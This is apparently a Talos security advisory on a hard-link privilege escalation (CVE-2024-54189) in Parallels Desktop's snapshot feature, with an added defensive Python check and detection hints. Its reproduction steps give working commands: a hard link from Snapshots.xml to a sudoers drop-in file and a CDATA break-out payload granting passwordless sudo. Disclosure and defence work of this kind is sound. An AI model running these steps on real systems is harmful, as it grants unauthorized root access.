Talos Vulnerability Report

TALOS-2024-2124

Parallels Desktop prl_disp_service Snapshots.xml Hard Link Privilege Escalation

June 3, 2025

CVE Number

CVE-2024-54189

SUMMARY

A privilege escalation vulnerability exists in the Snapshot functionality of Parallels Desktop for Mac version 20.1.1 (build 55740). When a snapshot of a virtual machine is taken, a root service writes to a file owned by a normal user. By using a hard link, an attacker can write to an arbitrary file, potentially leading to privilege escalation.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Parallels Desktop for Mac version 20.1.1 (55740)

PRODUCT URLS

Parallels Desktop for Mac - https://www.parallels.com/products/desktop/

CVSSv3 SCORE

7.8 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-62 - UNIX Hard Link

DETAILS

Parallels Desktop for Mac is an application that provides desktop virtualization, allowing users to run macOS, Windows, or Linux virtual machines on a Mac. It offers tools to create, configure, and manage virtual machines effectively.

prl_disp_service is a Parallels Desktop service that manages all communication between macOS, Parallels Desktop, and virtual machines. This service runs with root privileges.

A privilege escalation vulnerability exists when a snapshot of a virtual machine is taken. During this process, prl_disp_service writes details about the snapshot, including its name and description, to the Snapshots.xml file. These details are controlled by the user. The Snapshots.xml file is written to the VM directory, which is owned by a normal user. To exploit this, a user can replace the Snapshots.xml file with a hard link to a file owned by root and then take a snapshot of the VM, injecting a payload via the name or description field. The prl_disp_service then "follows" the hard link: it writes through the existing directory entry into the root-owned inode, so the attacker-controlled payload lands in the root-owned file. This allows an attacker to write to arbitrary files owned by root, potentially performing privileged actions.
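The check a privileged writer needs before touching a file in a user-owned directory, as an added example written here from the defender's side (not Parallels' code or the vendor's patch): inspect the existing entry with lstat and refuse if it is not a regular file, has a link count above 1, or is not owned by the expected user, then write via a temporary file plus rename so no pre-existing inode is ever opened for writing. demo() builds a constructed scenario in a temporary directory; the file named protected stands in for the root-owned target, since the demo cannot create a root-owned file.

```python
import os
import stat
import tempfile

def check_write_target(path, expected_uid):
    # Reasons a privileged process must NOT write `path` in place; [] means safe.
    reasons = []
    try:
        st = os.lstat(path)  # lstat: never follow a symlink
    except FileNotFoundError:
        return reasons  # nothing to replace; creating a new file is fine
    if not stat.S_ISREG(st.st_mode):
        reasons.append("not a regular file")
    if st.st_nlink > 1:  # the advisory's hard link: ls shows a link count of 2 or 3
        reasons.append("link count %d > 1 (hard link)" % st.st_nlink)
    if st.st_uid != expected_uid:  # root-owned inode inside a user-owned VM dir
        reasons.append("owner uid %d != expected %d" % (st.st_uid, expected_uid))
    return reasons

def write_snapshot_xml(path, content, expected_uid):
    # Refuse if the entry fails the checks; else write a temp file and rename it
    # over `path`, so no pre-existing inode is ever opened for writing.
    reasons = check_write_target(path, expected_uid)
    if reasons:
        raise PermissionError("refusing to write %s: %s" % (path, "; ".join(reasons)))
    fd, tmp = tempfile.mkstemp(prefix=".Snapshots.xml.", dir=os.path.dirname(path))
    try:
        with os.fdopen(fd, "w") as f:
            f.write(content)
        os.replace(tmp, path)
    except BaseException:
        os.unlink(tmp)
        raise

def demo():
    # Constructed: Snapshots.xml in a VM dir is a hard link to "protected" (root stand-in).
    uid = os.getuid()
    with tempfile.TemporaryDirectory() as vm_dir:
        target = os.path.join(vm_dir, "protected")
        open(target, "w").close()
        snap = os.path.join(vm_dir, "Snapshots.xml")
        os.link(target, snap)  # the attacker's hard link
        refused = check_write_target(snap, uid + 1)  # uid + 1: VM user != owner
        try:
            write_snapshot_xml(snap, "<ParallelsSavedStates/>", uid)
        except PermissionError:
            os.unlink(snap)  # drop the link; a plain user-owned file is fine
            write_snapshot_xml(snap, "<ParallelsSavedStates/>", uid)
        with open(target) as f:
            untouched = f.read() == ""  # the protected file was never written
    return refused, untouched
```

The same indicators work for after-the-fact detection: an ls -la on Snapshots.xml that shows a link count above 1 or an owner other than the VM's user, as in step 3 below, is the sign that the file has been replaced by a hard link.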

Steps to reproduce

  1. Select a virtual machine (VM) that does not have any snapshots. If the selected VM has existing snapshots, delete all of them before proceeding.
  2. Navigate to the selected VM’s folder and delete or move the Snapshots.xml file if it already exists.

     % cd Ubuntu_main.pvm

     % ls -la Snapshots.xml
     -rw-------  1 main  staff  784  3 Dec 12:01 Snapshots.xml

     % rm Snapshots.xml

  3. Create a hard link to a file owned by root. In this case, the target is the sudoers drop-in file /etc/sudoers.d/user.

     % ln  /etc/sudoers.d/user Snapshots.xml

     % cat Snapshots.xml

     % ls -la /etc/sudoers.d/user
     -rw-r--r--  2 root  wheel  0  3 Dec 12:36 /etc/sudoers.d/user

     % ls -la Snapshots.xml
     -rw-r--r--  3 root  wheel  0  3 Dec 12:36 Snapshots.xml

    Here, the sudoers drop-in file is still empty (size 0), and Snapshots.xml now shows root ownership and a link count above 1.

  4. Next, open the Control Center of the Parallels Desktop application. Right-click on the selected VM and choose Manage Snapshots. Then, click the New button to create a new snapshot. This will open a window. Enter the following text in the Description field and click the OK button to create the snapshot.

     A]]></Description>

     ALL ALL=(ALL) NOPASSWD:ALL

     #

Note that the Snapshots window will not list the new snapshot because the content of Snapshots.xml is now malformed XML. In this case, the payload ALL ALL=(ALL) NOPASSWD:ALL allows any user to run the sudo command without a password.

Behind the scenes, the prl_disp_service will follow the hard link and write the payload to /etc/sudoers.d/user. The content is as follows:

cat /etc/sudoers.d/user
<?xml version="1.0" encoding="UTF-8"?>
<ParallelsSavedStates>
    <SavedStateItem state="poweroff" guid="">
        <Name></Name>
        <DateTime></DateTime>
        <Creator></Creator>
        <ScreenShot></ScreenShot>
        <Description><![CDATA[]]></Description>
        <AutoCreatedForLinkedClone>-1</AutoCreatedForLinkedClone>
        <SavedStateItem current="yes" state="poweroff" guid="{1d0de523-a240-4783-b1e9-77e181733475}">
            <Name>Snapshot 1</Name>
            <DateTime>2024-12-03 12:40:42</DateTime>
            <Creator></Creator>
            <ScreenShot></ScreenShot>
            <Description><![CDATA[A]]></Description>

ALL ALL=(ALL) NOPASSWD:ALL

#]]></Description>
            <AutoCreatedForLinkedClone>0</AutoCreatedForLinkedClone>
        </SavedStateItem>
    </SavedStateItem>
</ParallelsSavedStates>

Now, a normal user can run any command with sudo without needing a password.

sudo ls
/private/etc/sudoers.d/user:1:19: syntax error
<?xml version="1.0" encoding="UTF-8"?>
                  ^
/private/etc/sudoers.d/user:2:22: syntax error
<ParallelsSavedStates>
                     ^
/private/etc/sudoers.d/user:3:36: syntax error
    <SavedStateItem state="poweroff" guid="">
                                   ^
[...]
VRAM.dat               Ubuntu_main-0.hdd       config.pvs              
Snapshots               Ubuntu_main.app         config.pvs.backup      

Note that every command run with sudo prints these syntax errors because the file also contains the XML skeleton, which is not valid sudoers syntax; sudo nevertheless honours the injected NOPASSWD line, as the directory listing printed after the errors shows.

By exploiting this vulnerability, a low-privilege user can potentially overwrite arbitrary files and escalate their privileges to those of a root user.

TIMELINE

2024-12-18 - Vendor Disclosure
2025-04-17 - Vendor Patch Release
2025-06-03 - Public Release

Credit

Discovered by KPC of Cisco Talos.